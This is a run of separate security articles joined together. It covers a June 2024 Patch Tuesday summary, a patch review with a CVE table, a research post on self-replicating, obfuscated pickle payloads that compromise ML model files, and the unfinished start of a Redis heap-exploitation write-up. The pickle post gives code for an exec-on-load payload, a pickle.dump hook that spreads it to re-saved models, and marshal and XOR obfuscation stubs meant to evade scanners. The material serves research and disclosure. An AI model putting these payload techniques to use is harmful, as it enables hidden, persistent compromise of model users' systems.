
Only one critical issue disclosed as part of Microsoft Patch Tuesday

Microsoft released its monthly security update Tuesday, disclosing 49 vulnerabilities across its suite of products and software.  

Of those, only one is a critical vulnerability. Every other security issue disclosed this month is considered "important."

The lone critical security issue is CVE-2024-30080, a remote code execution vulnerability due to a use-after-free (UAF) issue in the HTTP handling function of Microsoft Message Queuing (MSMQ).

An adversary can send a specially crafted malicious MSMQ packet to an MSMQ server, potentially allowing them to perform remote code execution on the server side. Microsoft considers this vulnerability “more likely” to be exploited. 

There is also a remote code execution vulnerability in Microsoft Outlook, CVE-2024-30103. By successfully exploiting this vulnerability, an adversary can bypass Outlook registry block lists and enable the creation of malicious DLL (Dynamic Link Library) files. However, the adversary must be authenticated using valid Microsoft Exchange user credentials. Microsoft has also mentioned that the Outlook application Preview Pane is an attack vector. 

The company also disclosed a high-severity elevation of privilege vulnerability in the Azure Monitor Agent (CVE-2024-35254). An unauthenticated adversary with read access permissions can exploit this vulnerability to perform arbitrary file and folder deletion on a host where the Azure Monitor Agent is installed. The vulnerability does not disclose confidential information, but it could allow the adversary to delete data, which could result in a denial of service.

CVE-2024-30077, a high-severity remote code execution vulnerability in Microsoft OLE (Object Linking and Embedding), could also be triggered if an adversary tricks an authenticated user into attempting to connect to a malicious SQL server database via a connection driver (OLE DB or OLEDB). This could result in the database returning malicious data that could cause arbitrary code execution on the client.  

The Windows Wi-Fi driver also contains a high-severity remote code execution vulnerability, CVE-2024-30078. An adversary can exploit this vulnerability by sending a malicious networking packet to an adjacent system employing a Wi-Fi networking adapter, which could enable remote code execution. However, to exploit this vulnerability, an adversary must be near the target system to send and receive radio transmissions.  

CVE-2024-30063 and CVE-2024-30064 are high-severity elevation of privilege vulnerabilities in the Windows Distributed File System (DFS). An adversary who successfully exploits these vulnerabilities could gain elevated privileges through a vulnerable DFS client, allowing the adversary to locally execute arbitrary code in the kernel. However, an adversary must be locally authenticated and run a specially crafted application to exploit these vulnerabilities.

Talos would also like to highlight a few more high-severity elevation of privilege vulnerabilities that Microsoft considers “more likely” to be exploited. 

CVE-2024-30068, an elevation of privilege vulnerability in the Windows kernel, could allow an adversary to gain SYSTEM-level privileges. By exploiting this vulnerability from a low-privilege AppContainer, an adversary can elevate their privileges and execute code or access resources at a higher integrity level than that of the AppContainer execution environment. However, the adversary must first log on to the system and then run a specially crafted application that exploits the vulnerability to take control of an affected system.

There are three high-severity elevation of privilege vulnerabilities — CVE-2024-30082, CVE-2024-30087 and CVE-2024-30091 — in Win32K kernel drivers that exist because of an out-of-bounds (OOB) issue. An adversary who exploits CVE-2024-30082 could gain SYSTEM privileges, while exploiting CVE-2024-30087 or CVE-2024-30091 would grant the rights of the user running the affected application. Microsoft considers these vulnerabilities “more likely” to be exploited. 

CVE-2024-30088 and CVE-2024-30099 are two high-severity elevation of privilege vulnerabilities in NT kernel drivers that are also considered “more likely” to be exploited. Successful exploitation would grant an adversary the privileges of the local user and SYSTEM, respectively.

Mskssrv, a Microsoft Streaming Service kernel driver, also contains two elevation of privilege vulnerabilities: CVE-2024-30089 and CVE-2024-30090. An adversary successfully exploiting these vulnerabilities could gain SYSTEM privileges.   

CVE-2024-30084 and CVE-2024-35250 are two more high-severity elevation of privilege vulnerabilities in the Windows Kernel-Mode driver that are considered “more likely” to be exploited. An adversary could gain SYSTEM privileges by successfully exploiting these vulnerabilities, but must first win a race condition.

A complete list of all the vulnerabilities Microsoft disclosed this month is available on its update page.  

In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date, and current rules are subject to change pending additional information. Cisco Secure Firewall customers should use the latest update to their rule set by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.  

The rules included in this release that protect against the exploitation of many of these vulnerabilities are 63581 - 63591, 63596 and 63597. There are also Snort 3 pre-processor rules 300937 - 300940.

The June 2024 Security Update Review

Somehow, we’ve made it to the sixth Patch Tuesday of 2024, and Microsoft and Adobe have released their regularly scheduled updates. Take a break from your regular activities and join us as we review the details of their latest security alerts. If you’d rather watch the full video recap covering the entire release, you can check it out here:

Adobe Patches for June 2024

For June, Adobe released 10 patches addressing 165(!) CVEs in Adobe Cold Fusion, Photoshop, Experience Manager, Audition, Media Encoder, FrameMaker Publishing Server, Adobe Commerce, Substance 3D Stager, Creative Cloud Desktop, and Acrobat Android. The fix for Experience Manager is by far the largest with a whopping 143 CVEs addressed. However, all but one of these bugs are simply cross-site scripting (XSS) vulnerabilities. The patch for Cold Fusion fixes two bugs, but neither are code execution bugs. That’s the same case for the patch addressing bugs in Audition. The fix for Media Encoder has a single OOB Read memory leak fixed. The update for Photoshop also has just one bug – a Critical-rated code execution issue. That’s also the story for the Substance 3D Stager patch.

The patch for FrameMaker Publishing Server has only two bugs, but one is a CVSS 10 and the other is a 9.8. If you’re using this product, this should be the first patch you test and deploy. The patch for Commerce should also be high on your test-and-deploy list as it corrects 10 bugs, including some Critical-rated code execution vulns. The patch for Creative Cloud Desktop fixes a single code execution bug. Finally, the patch for Acrobat Android corrects two security feature bypasses.

None of the bugs fixed by Adobe this month are listed as publicly known or under active attack at the time of release. Adobe categorizes these updates as a deployment priority rating of 3.

Microsoft Patches for June 2024

This month, Microsoft released 49 CVEs in Windows and Windows Components; Office and Office Components; Azure; Dynamics Business Central; and Visual Studio. If you include the third-party CVEs being documented this month, the CVE count comes to 58. A total of eight of these bugs came through the ZDI program, and that does include some of the cases reported during the Pwn2Own Vancouver contest in March.

Of the new patches released today, only one is rated Critical, and 48 are rated Important in severity. This release is another small release when compared to the monster that was April.

Only one of the CVEs released today is listed as publicly known, but that’s actually just a third-party update that’s now being integrated into Microsoft products. Nothing is listed as being under active attack. Let’s take a closer look at some of the more interesting updates, starting with the lone Critical-rated patch for this month:

-       CVE-2024-30080 – Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability
This update receives a CVSS rating of 9.8 and would allow remote, unauthenticated attackers to execute arbitrary code with elevated privileges on systems where MSMQ is enabled. That makes this wormable between those servers, but not to systems where MSMQ is disabled. This is similar to the “QueueJumper” vulnerability from last year, but it’s not clear how many affected systems are exposed to the internet. While it is likely a low number, now would be a good time to audit your networks to ensure TCP port 1801 is not reachable (a quick reachability-check sketch follows these highlights).

-       CVE-2024-30103 – Microsoft Outlook Remote Code Execution Vulnerability
This patch corrects a bug that allows attackers to bypass Outlook registry block lists and enable the creation of malicious DLL files. While not explicitly stated, attackers would likely then use the malicious DLL files to perform some form of DLL hijacking for further compromise. The good news here is that the attacker would need valid Exchange credentials to perform this attack. The bad news is that the exploit can occur in the Preview Pane. Considering how often credentials end up being sold in underground forums, I would not ignore this fix.  

-       CVE-2024-30078 – Windows Wi-Fi Driver Remote Code Execution Vulnerability
This vulnerability allows an unauthenticated attacker to execute code on an affected system by sending the target a specially crafted network packet. Obviously, the target would need to be in Wi-Fi range of the attacker and using a Wi-Fi adapter, but that’s the only restriction. Microsoft rates this as “exploitation less likely” but considering it hits every supported version of Windows, it will likely draw a lot of attention from attackers and red teams alike.
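As a quick way to act on the port 1801 advice above, here is a minimal reachability check. This is an illustrative sketch rather than an official tool, and the host list is a hypothetical placeholder for your own inventory:

import socket

# Hypothetical host list; substitute the systems you want to audit.
HOSTS = ["10.0.0.5", "10.0.0.6"]
MSMQ_PORT = 1801  # MSMQ's default TCP port

for host in HOSTS:
    try:
        # A completed TCP handshake means the MSMQ port is reachable
        # and the host deserves a closer look.
        with socket.create_connection((host, MSMQ_PORT), timeout=2):
            print(f"{host}: TCP/{MSMQ_PORT} reachable -- review MSMQ exposure")
    except OSError:
        print(f"{host}: TCP/{MSMQ_PORT} not reachable")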

Here’s the full list of CVEs released by Microsoft for June 2024:

CVE Title Severity CVSS Public Exploited Type
CVE-2024-30080 Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability Critical 9.8 No No RCE
CVE-2024-35255 Azure Identity Libraries and Microsoft Authentication Library Elevation of Privilege Vulnerability Important 5.5 No No EoP
CVE-2024-35254 † Azure Monitor Agent Elevation of Privilege Vulnerability Important 7.1 No No EoP
CVE-2024-37325 † Azure Science Virtual Machine (DSVM) Elevation of Privilege Vulnerability Important 9.8 No No EoP
CVE-2024-35252 Azure Storage Movement Client Library Denial of Service Vulnerability Important 7.5 No No DoS
CVE-2024-30070 DHCP Server Service Denial of Service Vulnerability Important 7.5 No No DoS
CVE-2024-29187 * GitHub: CVE-2024-29187 WiX Burn-based bundles are vulnerable to binary hijack when run as SYSTEM Important 7.3 No No EoP
CVE-2024-35253 Microsoft Azure File Sync Elevation of Privilege Vulnerability Important 4.4 No No EoP
CVE-2024-35263 Microsoft Dynamics 365 (On-Premises) Information Disclosure Vulnerability Important 5.7 No No Info
CVE-2024-35248 Microsoft Dynamics 365 Business Central Elevation of Privilege Vulnerability Important 7.3 No No EoP
CVE-2024-35249 Microsoft Dynamics 365 Business Central Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-30072 Microsoft Event Trace Log File Parsing Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2024-30104 Microsoft Office Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2024-30101 Microsoft Office Remote Code Execution Vulnerability Important 7.5 No No RCE
CVE-2024-30102 Microsoft Office Remote Code Execution Vulnerability Important 7.3 No No RCE
CVE-2024-30103 Microsoft Outlook Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-30100 Microsoft SharePoint Server Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2024-30097 Microsoft Speech Application Programming Interface (SAPI) Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-30089 Microsoft Streaming Service Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2024-30090 Microsoft Streaming Service Elevation of Privilege Vulnerability Important 7 No No EoP
CVE-2023-50868 * MITRE: CVE-2023-50868 NSEC3 closest encloser proof can exhaust CPU Important 7.5 Yes No DoS
CVE-2024-29060 Visual Studio Elevation of Privilege Vulnerability Important 6.7 No No EoP
CVE-2024-30052 Visual Studio Remote Code Execution Vulnerability Important 4.7 No No RCE
CVE-2024-30082 Win32k Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2024-30087 Win32k Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2024-30091 Win32k Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2024-30085 Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2024-30076 Windows Container Manager Service Elevation of Privilege Vulnerability Important 6.8 No No EoP
CVE-2024-30096 Windows Cryptographic Services Information Disclosure Vulnerability Important 5.5 No No Info
CVE-2024-30063 Windows Distributed File System (DFS) Remote Code Execution Vulnerability Important 6.7 No No RCE
CVE-2024-30064 Windows Kernel Elevation of Privilege Vulnerability Important 8.8 No No EoP
CVE-2024-30068 Windows Kernel Elevation of Privilege Vulnerability Important 8.8 No No EoP
CVE-2024-30088 Windows Kernel Elevation of Privilege Vulnerability Important 7 No No EoP
CVE-2024-30099 Windows Kernel Elevation of Privilege Vulnerability Important 7 No No EoP
CVE-2024-35250 Windows Kernel-Mode Driver Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2024-30084 Windows Kernel-Mode Driver Elevation of Privilege Vulnerability Important 7 No No EoP
CVE-2024-30074 Windows Link Layer Topology Discovery Protocol Remote Code Execution Vulnerability Important 8 No No RCE
CVE-2024-30075 Windows Link Layer Topology Discovery Protocol Remote Code Execution Vulnerability Important 8 No No RCE
CVE-2024-30077 Windows OLE Remote Code Execution Vulnerability Important 8 No No RCE
CVE-2024-35265 Windows Perception Service Elevation of Privilege Vulnerability Important 7 No No EoP
CVE-2024-30069 Windows Remote Access Connection Manager Information Disclosure Vulnerability Important 4.7 No No Info
CVE-2024-30094 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2024-30095 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2024-30083 Windows Standards-Based Storage Management Service Denial of Service Vulnerability Important 7.5 No No DoS
CVE-2024-30062 Windows Standards-Based Storage Management Service Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2024-30093 Windows Storage Elevation of Privilege Vulnerability Important 7.3 No No EoP
CVE-2024-30065 Windows Themes Denial of Service Vulnerability Important 5.5 No No DoS
CVE-2024-30078 Windows Wi-Fi Driver Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-30086 Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2024-30066 Winlogon Elevation of Privilege Vulnerability Important 5.5 No No EoP
CVE-2024-30067 WinLogon Elevation of Privilege Vulnerability Important 5.5 No No EoP
CVE-2024-5493 * Chromium: CVE-2024-5493 Heap buffer overflow in WebRTC High N/A No No RCE
CVE-2024-5494 * Chromium: CVE-2024-5494 Use after free in Dawn High N/A No No RCE
CVE-2024-5495 * Chromium: CVE-2024-5495 Use after free in Dawn High N/A No No RCE
CVE-2024-5496 * Chromium: CVE-2024-5496 Use after free in Media Session High N/A No No RCE
CVE-2024-5497 * Chromium: CVE-2024-5497 Out of bounds memory access in Keyboard Inputs High N/A No No RCE
CVE-2024-5498 * Chromium: CVE-2024-5498 Use after free in Presentation API High N/A No No RCE
CVE-2024-5499 * Chromium: CVE-2024-5499 Out of bounds write in Streams API High N/A No No RCE

* Indicates this CVE had been released by a third party and is now being included in Microsoft releases.

† Indicates further administrative actions are required to fully address the vulnerability.

 

Looking at the other fixes addressing code execution bugs, there are a couple that stand out. In addition to the Wi-Fi bug above, there are two similar bugs in the Link Layer Topology Discovery Protocol with similar exploit vectors. The difference is that for these two bugs, the target needs to be running the Network Map functionality for the attack to succeed. There are several “open-and-own” type vulnerabilities getting patched. The one to look out for would be the Office bug that states, “The Preview Pane is an attack vector, but additional user interaction is required.” It’s not clear how that would manifest. The exploit for DFS requires an adjacent attacker to already be executing code on a target, which reads more like an EoP to me. The OLE bug requires connecting to a malicious SQL server. The bug in the Speech Application Programming Interface (SAPI) requires a user to click a link to connect to the attacker’s server. Lastly, the code execution bug in Dynamics 365 requires authentication, which again sounds more like an EoP, but it also states no user interaction is required. It’s an odd write-up that implies it’s unlikely to be exploited in the wild.

More than half of this month’s release corrects privilege escalation bugs, but the majority of these lead to SYSTEM-level code execution if an authenticated user runs specially crafted code. Other privilege escalation bugs would allow the attacker to get to the level of the running application. The bugs in Winlogon are somewhat intriguing as they could allow an attacker to replace valid file content with specially crafted file content. One of the kernel bugs could be used for a container escape. The bug in the Perception Service could allow elevation to the “NT AUTHORITY\LOCAL SERVICE” account. The vulnerability in Visual Studio requires an attacker to create a malicious extension. An authenticated user would then need to create a Visual Studio project that uses that extension. If they manage all of that, it would lead to admin privileges.

The bug in Azure Identity Libraries and Microsoft Authentication Library allows attackers to read any file on the target with SYSTEM privileges. The privilege escalation in Azure Monitor Agent could let attackers delete files and folders. If you’ve disabled Automatic Extension Upgrades, you’ll need to perform a manual update to ensure the Monitor Agent is at the latest version. Speaking of extra actions, the bug in the Azure Science Virtual Machine (DSVM) requires you to upgrade your DSVM to Ubuntu 20.04. If you’re not familiar with this procedure, Microsoft provides this article for guidance. Attackers who exploit this bug could gain access to user credentials, which would allow them to impersonate authorized users.

There are only three information disclosure bugs receiving fixes this month, and only one results in info leaks consisting of unspecified memory contents. The bug in the on-prem version of Dynamics 365 could allow an attacker to exfiltrate all the data accessible to the logged-on user. The vulnerability in the Cryptographic Services could disclose sensitive information such as KeyGuard (KG) keys, which are intended to be per-boot keys used to protect sensitive data. An attacker could potentially use these to decrypt anything encrypted with those keys.

The final bugs for June address Denial-of-Service (DoS) vulnerabilities in Windows and Azure components. Unfortunately, Microsoft provides no additional information about these bugs and how they would manifest on affected systems. They do note the DoS in the DHCP Server does not affect those who have configured failover for their DHCP setup.

There are no new advisories in this month’s release.

Looking Ahead

The next Patch Tuesday of 2024 will be on July 9, and I’ll return with details and patch analysis then. Until then, stay safe, happy patching, and may all your reboots be smooth and clean!

Exploiting ML models with pickle file attacks: Part 2

By Boyan Milanov

In part 1, we introduced Sleepy Pickle, an attack that uses malicious pickle files to stealthily compromise ML models and carry out sophisticated attacks against end users. Here we show how this technique can be adapted to enable long-lasting presence on compromised systems while remaining undetected. This variant technique, which we call Sticky Pickle, incorporates a self-replicating mechanism that propagates its malicious payload into successive versions of the compromised model. Additionally, Sticky Pickle uses obfuscation to disguise the malicious code to prevent detection by pickle file scanners.

Making malicious pickle payloads persistent

Recall from our previous blog post that Sleepy Pickle exploits rely on injecting a malicious payload into a pickle file containing a packaged ML model. This payload is executed when the pickle file is deserialized to a Python object, compromising the model’s weights and/or associated code. If the user decides to modify the compromised model (e.g., fine-tuning) and then re-distribute it, it will be serialized in a new pickle file that the attacker does not control. This process will likely render the exploit ineffective.
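As a quick refresher on why deserialization alone is dangerous: pickle lets an object specify an arbitrary callable to be invoked at load time. Here is a minimal illustration of the mechanism (our own example, not the actual Sleepy Pickle payload):

import pickle

class Dropper:
    # __reduce__ tells pickle to rebuild this object by calling exec()
    # on attacker-controlled source code during deserialization.
    def __reduce__(self):
        return (exec, ("print('payload runs inside pickle.loads()')",))

blob = pickle.dumps(Dropper())
pickle.loads(blob)  # prints the message: loading the file ran our code

Sleepy Pickle injects equivalent opcodes directly into an existing model file rather than pickling a helper class, but the load-time execution primitive is the same.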

To overcome this limitation, we developed Sticky Pickle, a self-replication mechanism that wraps our model-compromising payload in an encapsulating, persistent payload. The encapsulating payload does the following actions as it’s executed (a simplified sketch of the step 4 hook follows the list):

    1. Find the original compromised pickle file being loaded on the local filesystem.
    2. Open the file and read the encapsulating payload’s bytes from disk. (The payload cannot access them directly via its own Python code.)
    3. Hide its own bytecode in the object being unpickled under a predefined attribute name.
    4. Hook the pickle.dump() function so that when an object is re-serialized, it:
      • Serializes the object using the regular pickle.dump() function.
      • Detects that the object contains the bytecode attribute.
      • Manually injects the bytecode in the new Pickle file that was just created.
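A minimal sketch of the hook from step 4 might look like the following. The attribute and function names are ours, and the real payload patches the opcode stream of the new file rather than simply appending bytes:

import pickle

PAYLOAD_ATTR = "_sticky_payload"  # hypothetical attribute from step 3
_original_dump = pickle.dump      # keep a reference to the real function

def _hooked_dump(obj, file, *args, **kwargs):
    # Serialize the object normally with the regular pickle.dump().
    _original_dump(obj, file, *args, **kwargs)
    # If the object carries our payload bytes, re-inject them into the
    # freshly written file (simplified: the real attack rewrites the
    # opcode stream so the payload still executes on the next load).
    payload = getattr(obj, PAYLOAD_ATTR, None)
    if payload is not None:
        file.write(payload)

pickle.dump = _hooked_dump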

Figure 1: Persistent payload in malicious ML model files

With this technique, malicious pickle payloads automatically spread to derivative models without leaving a trace on the disk outside of the infected pickle file. Moreover, the ability to hook any function in the Python interpreter allows for other attack variations as the attacker can access other local files, such as training datasets or configuration files.

Payload obfuscation: Going under the radar

Another limitation of pickle-based exploits arises from the malicious payload being injected directly as Python source code. This means that the malicious code appears in plaintext in the Pickle file. This has several drawbacks. First, it is possible to detect the attack with naive file scanning and a few heuristics that target the presence of significant chunks of raw Python within Pickle files. Second, it’s easy for security teams to identify the attack and its intent just by looking at it.

We developed a payload obfuscation and encoding method that overcomes these limitations and makes payload detection much harder. Starting with our original payload consisting of code that compromises the pickled ML model, we modify it in two ways.

First, we obfuscate the payload by compiling it into a Python code object and serializing it into a string with the marshal library. This lets us inject this serialized payload string into the pickle file, followed by a special bytecode sequence. When executed, this special sequence calls marshal.loads() on the string to reconstruct the code object of the payload and execute it. This makes the payload completely unreadable to scanners or human inspection as it is injected as compiled Python bytecode instead of source code.
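In outline, the obfuscation step looks something like this simplified reconstruction (the payload source here is a harmless stand-in):

import marshal

payload_src = "print('model-compromising code would run here')"

# Compile the payload to a code object and serialize it with marshal,
# yielding opaque bytecode bytes rather than readable source.
serialized = marshal.dumps(compile(payload_src, "<payload>", "exec"))

# The attacker injects `serialized` into the pickle along with opcodes
# that evaluate the equivalent of this line at load time:
exec(marshal.loads(serialized))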

Second, we use a simple XOR encoding to vary the payload in every infected file. Instead of consisting of only the original model-compromising code, the XORed payload contains the XOR-encoded Python source of the original payload and a decoding and execution stub similar to this:

def compromise_model(model):
    # The string of the XOR-encoded python payload source code
    # (elided here; the encoded bytes are filled in at injection time)
    encoded_payload = ...
    # This line decodes the payload and executes it; 0x{XOR_KEY:X} is a
    # template placeholder for the hardcoded key
    exec(bytearray(b ^ 0x{XOR_KEY:X} for b in encoded_payload))
    return model

Since the obfuscation key can take any value and is hardcoded in the decoding stub, this method complements the persistence feature by allowing attackers to write a payload that generates a new obfuscation key upon reinjection in a new pickle file. This results in different Python payloads, code objects, and final pickle payloads being injected into compromised files, while the malicious behavior remains unchanged.
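A sketch of what that re-keying could look like at propagation time (names are ours):

import os

def xor_encode(payload_src):
    # Pick a fresh key on every reinjection so the encoded bytes -- and
    # therefore the final pickle payload -- differ in each infected file.
    key = os.urandom(1)[0] or 0x42  # avoid a zero key, which is a no-op
    return bytes(b ^ key for b in payload_src), key

encoded, key = xor_encode(b"compromise_model source goes here")
# Decoding stub specialized with the new hardcoded key:
stub = f"exec(bytearray(b ^ 0x{key:X} for b in encoded_payload))"
print(stub)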

Figure 2: Obfuscation of the Python payload before injection in a pickle file

Figure 2 shows how this obfuscation method completely hides the malicious payload within the file. Automated tools or security analysts scanning the file would see only:

  1. The raw bytes of the Python payload that was compiled and then marshaled. It is difficult, if not impossible, to interpret these bytes and flag them as dangerous with static scanning.
  2. The pickle sequence that calls marshal.loads(). This is a common pattern also found in benign pickle files and thus is not sufficient to alert users about potential malicious behavior.

When a pickle file containing the obfuscated payload is loaded, the payload stages are executed in the following order, illustrated in figure 3:

  1. The malicious pickle opcodes load the raw bytes of the serialized code object, then reconstruct the Python code object using marshal.loads(), and finally execute the code object.
  2. The code object is executed and decodes the XOR-encoded Python source code of the original payload.
  3. The decoded original payload code is executed and compromises the loaded ML model.

Figure 3: Overview of execution stages of the obfuscated payload

Sealing the lid on pickle

These persistence and evasion techniques show the level of sophistication that pickle exploits can achieve. Expanding on the critical risks we demonstrated in part one of this series, we’ve seen how a single malicious pickle file can:

  • Compromise other local pickle files and ML models.
  • Evade file scanning and make manual analysis significantly harder.
  • Make its payload polymorphic and spread it under an ever-changing form while maintaining the same final stage and end goal.

While these are only examples among other possible attack improvements, persistence and evasion are critical aspects of pickle exploits that, to our knowledge, have not yet been demonstrated.

Despite the risks posed by pickle files, we acknowledge that it will be a long-term effort for major frameworks of the ML ecosystem to move away from them. In the short term, here are some action steps you can take to eliminate your exposure to these issues:

  • Avoid using pickle files to distribute serialized models.
  • Adopt safer alternatives to pickle files such as HuggingFace’s SafeTensors.
  • If you must use pickle files, scan them with our very own Fickling to detect pickle-based ML attacks.

Long-term, we are continuing our efforts to drive the ML industry to adopt secure-by-design technologies. If you want to learn more about our contributions, check out our awesome-ml-security and ml-file-formats GitHub repositories and our recent responsible disclosure of a critical GPU vulnerability called Leftover Locals!

Acknowledgments

Thanks to our intern Russel Tran for their hard work on pickle payload obfuscation and optimization.

Pumping Iron on the Musl Heap – Real World CVE-2022-24834 Exploitation on an Alpine mallocng Heap

This post is about exploiting CVE-2022-24834 against a Redis container
running on Alpine Linux. CVE-2022-24834 is a vulnerability affecting
the Lua cjson module in Redis servers <=7.0.11. The bug is an integer
overflow that leads to a large copy of data, approximately 350MiB.

A colleague from NCC Group wanted to exploit this bug but found that
the public exploits didn’t work. This was ultimately due to those
exploits being written to target Ubuntu or similar distros, which use
the GNU libc library. The target in our case was Alpine 3.18, which
uses musl libc 1.2.4. The important distinction here is that GNU libc
uses the ptmalloc2 heap allocator, and musl 1.2.4 uses its own custom
allocator called mallocng. This resulted in some interesting
differences during exploitation, which I figured I would document
since there’s not a lot of public information about targeting the musl
heap.

I highly recommend reading Ricerca Security’s original writeup,
which goes into depth about the vulnerability and how they approached
exploitation on ptmalloc2. Conviso Labs has a README.md that describes
some improvements that they made, which is also worth a look.
There are quite a few differences between exploitation on ptmalloc2 and
mallocng, which I’ll explain as I go. I’ll try not to repeat the details
that previous research has already provided but rather focus on the
parts that differed for mallocng.

Finally, I want to note that I am not attacking the musl mallocng
allocator by corrupting its metadata, but rather I’m doing Lua-specific
exploitation on the mallocng heap, mimicking the strategy done by the
original exploit.

Lua 5.1

As the previous articles covered Lua internals in detail, I won’t
repeat that information here. Redis uses Lua 5.1, so it’s important to
refer to the specific version when reading, as Lua has undergone
significant changes across different releases. These changes include
structure layouts and the garbage collection algorithm utilized.

I would like to highlight that Lua utilizes Tagged Values to
represent various internal types such as numbers and tables. The
structure is defined as follows:

/*
** Tagged Values
*/

#define TValuefields                                                           \
    Value value;                                                               \
    int   tt

typedef struct lua_TValue {
    TValuefields;
} TValue;

In this structure, tt denotes the type, and
value can either be an inline value or a pointer depending
on the associated type. In Lua, a Table serves as the
primary storage type, akin to a dictionary or list in Python. It
contains an array of TValue structures. For simple types
like integers, value is used directly. However, for more
complex types like nested tables, value acts as a pointer.
For further implementation details, please refer to Lua’s
lobject.h file or the aforementioned articles.

During debugging, I discovered the need to inspect Lua 5.1 objects.
The Alpine redis-server target did not include symbols for
the static Lua library. To address this, I compiled my own version of
Lua and filtered out all function symbols to only access the structure
definitions easily. This was achieved by identifying and stripping out
all FUNC symbols using readelf -Ws and
objcopy --strip-symbol.

Additionally, I came across the GdbLuaExtension,
which offers pretty printers and other functionalities for analyzing Lua
objects, albeit supporting version 5.3 only. I made some minor
modifications
to enable its compatibility with Lua 5.1. These
changes enabled features like pretty printers for tables, although I
didn’t conduct exhaustive testing on the required functionalities.

This method provides a clearer analysis of objects like a
Table, presenting information in a more readable format
compared to a hexdump.

(gdb) p/x *(Table *) 0x7ffff7a05100
$2 = <lua_table> = {
  [1] = (TValue *) 0x7fffaf9ef620 <lua_table^> 0x7ffff4a76322,
  [2] = (TValue *) 0x7fffaf9ef630 <lua_table^> 0x7ffff7a051a0,
  [3] = (TValue *) 0x7fffaf9ef640 <lua_table^> 0x7ffff7a051f0,
  [4] = (TValue *) 0x7fffaf9ef650 <lua_table^> 0x7ffff7a05290,
  [5] = (TValue *) 0x7fffaf9ef660 <lua_table^> 0x7ffff7a052e0,

The Table we printed shows an array of
TValue structures, and we can see that each
TValue in our table is referencing another table.

Musl’s Next Generation Allocator – aka mallocng

On August 4, 2020,
musl 1.2.1 shipped a new heap algorithm called “mallocng”. This
allocator has received some good quality research in the past,
predominantly focused on CTF challenge exploitation. I didn’t find any
real-world exploitation examples, but if someone knows of some, please
let me know and I’ll update the article.

The mallocng allocator is slab-based and organizes fixed-sized
allocations (called slots) on multi-page slabs (called
groups). In general, groups are mmap()-backed.
However, groups containing small slots may actually be smaller than a
page, in which case the group is itself just a larger fixed-size slot
inside another group. The allocator not using brk() is an
important detail, as we will see later. The fixed size for a given
group is referred to as the group’s stride.
The mallocng allocator seems to be designed with security in mind,
mixing a combination of in-band metadata that contains some cookies,
with predominantly out-of-band metadata which is stored in slots on
dedicated group mappings that are prefixed with guard pages to prevent
corruption from linear overflows.

As I’m not actually going to be exploiting the allocator internals
itself, I won’t go into too much detail about the data structures. I
advise you to read pre-existing articles, which you can find in the
resource section.

There’s a useful gdb plugin called muslheap developed by xf1les, which
I made a lot of use of. xf1les also has an associated blog post, which
is worth reading. At the time of writing, I have a PR open to add this
functionality to pwndbg, and hopefully will have time to add some more
functionality to it afterwards.

There is one particularly interesting aspect of the allocator that I
want to go over, which is that it can adjust the starting offset of
slots inside a group across subsequent allocations, using a value it
calls the cycling offset. It only does so if the overhead of a given
slot inside the fixed size has a large enough remainder such that the
offset can be adjusted. Interestingly, in this case, because the slot we
are working in is the 0x50-stride group, and the Table
structure is 0x48 bytes, this cycling offset doesn’t apply. Since I
narrowly avoided having to deal with this, and originally thought I
would have to, I’ll still take a moment to explain what the mitigation
actually is for and what it looks like in practice.

mallocng Cycling Offset

The cycling offset is a technique used to mitigate double frees,
although it can have a negative effect on other exploitation scenarios
as well. It works by adjusting the offset of the user data part of an
allocation each time a chunk is used, wrapping back to the beginning
once the offset is larger than the slack space. The offset starts at 1
and increments each time the chunk is reused.

The idea behind mitigating a double free is that if a chunk is used
and then freed, and then re-used, the offset used for the second
allocation will not be the same as the first time, due to cycling. Then,
when it is double freed, that free will detect some in-band metadata
anomaly and fail.

The allocator goes about this offset cycling by abusing the fact that
groups have fixed-sized slots, and often the user data being allocated
will not fill up the entire space of the slot, resulting in some slack
space. If the remaining slack space in the slot is large enough, which
is calculated by subtracting both the size of the user data and the
required in-line metadata, then there are actually two in-line metadata
blocks used inside a slot. One contains an offset used to indicate the
actual start of the user data, and that user data will still have some
metadata prefixed before it.

The offset calculation is done in the enframe()
function in mallocng. Basically, each time a slot is allocated, the
offset is increased, and will wrap back around when it exceeds the size
of the slack.
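
As a rough mental model (not musl’s actual code), the cycling behaves
something like this, with all values in 16-byte UNITs:

UNIT = 16  # mallocng sizes in-band data in 16-byte units

def user_data_offset(stride, nominal_size, use_count):
    # Illustrative model only: "slack" is how much 16-byte play the
    # slot has around the user data; the offset cycles through it on
    # each reuse of the slot.
    slack_units = (stride - nominal_size) // UNIT
    if slack_units <= 1:
        return 0  # no room, as with 0x48-byte Tables in 0x50 strides
    return (use_count % slack_units) + 1  # starts at 1, then wraps

for n in range(5):
    print(n, hex(user_data_offset(0x140, 0x100, n) * UNIT))

This reproduces the behavior observed below: a 0x100-byte allocation
in a 0x140 stride starts 0x10 bytes into its slot on first use and
drifts on reuse, while a 0x48-byte Table in a 0x50 stride always sits
at offset 0.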

To demonstrate what the cycling offset looks like in practice, I will
focus on larger-than-Table stride groups, that have enough
slack such that the cycling offset will be used. If we review what the
stride sizes are, we see:

